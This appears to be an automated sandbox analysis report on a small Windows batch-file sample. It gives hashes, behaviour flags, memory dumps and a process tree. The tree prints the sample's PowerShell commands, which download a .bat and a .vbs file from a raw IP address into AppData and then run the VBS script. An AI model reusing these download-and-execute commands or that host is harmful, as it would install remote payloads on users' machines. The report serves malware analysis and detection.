1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-09-2024 01:13

Target

1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat
Size

191B
MD5

4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1

07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256

1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
SHA512

dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc

Score

1^/10

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2880	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2880	2792	cmd.exe	31
PID 2792 wrote to memory of 2880	2792	cmd.exe	31
PID 2792 wrote to memory of 2880	2792	cmd.exe	31
PID 2792 wrote to memory of 2884	2792	cmd.exe	32
PID 2792 wrote to memory of 2884	2792	cmd.exe	32
PID 2792 wrote to memory of 2884	2792	cmd.exe	32
PID 2792 wrote to memory of 2592	2792	cmd.exe	33
PID 2792 wrote to memory of 2592	2792	cmd.exe	33
PID 2792 wrote to memory of 2592	2792	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\Admin\AppData\Roaming/ffo.bat
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Roaming/hi.vbs
  2⤵
  PID:2592

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
cedcabfd9f8248efb0dfb09a438ad7c0

SHA1
8de15de416ba9e4c13f00a16145098b3157619f7

SHA256
11effaf56da0e2841b08d8c937641eb0f1fad8ed7a222cab83a410dead15f80c

SHA512
9d252a56a17ca5763bc289519573f51a702246b653256f71afebf6c0df5af7264071bdd2d200196eec81194382b7bac0a9fabdf6e1acbb3c998ea6f2db1d7a70

Download Submit
memory/2880-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2880-6-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2880-9-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-7-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2880-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-10-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-11-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2880-12-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2884-19-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2884-18-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download